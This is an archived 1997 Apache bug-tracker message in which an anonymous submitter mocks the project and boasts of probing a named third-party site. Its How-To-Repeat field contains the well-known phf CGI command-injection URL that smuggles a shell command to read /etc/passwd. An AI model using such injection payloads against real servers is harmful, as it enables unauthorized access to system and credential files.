www-apache-bugdb mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Anonymous [yea right]" <i@dunno.com[yea.right>, aga...@hyperreal.com
Subject mod_cgi/766: no problemo
Date Sun, 22 Jun 1997 03:40:02 GMT

>Number:         766
>Category:       mod_cgi
>Synopsis:       no problemo
>Confidential:   no
>Severity:       non-critical
>Priority:       medium
>Responsible:    apache (Apache HTTP Project)
>State:          open
>Class:          mistaken
>Submitter-Id:   apache
>Arrival-Date:   Sat Jun 21 20:40:01 1997
>Originator:     i@dunno.com[yea right,,,again]
>Organization:
apache
>Release:        newezt
>Environment:
The hack was testted on www.7thsphere.com and worked ungreat 
Thanks for letting me try to hack it =) 
i am going to get the server soon i think
>Description:
If you are getting a core dump, such as a SIGSEGV, please provide a backtrace (see the FAQ
for instructions).
>How-To-Repeat:
http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd <<--- has a 
damn cool efect on your servers [none at all] That is good cause 
i was testing the security of your servers and it worked fine i am
thinking of getting me one soon =)
>Fix:
nope.....you could invent a new feture that would set your server 
apart from the other
>Audit-Trail:
>Unformatted:



Mime
View raw message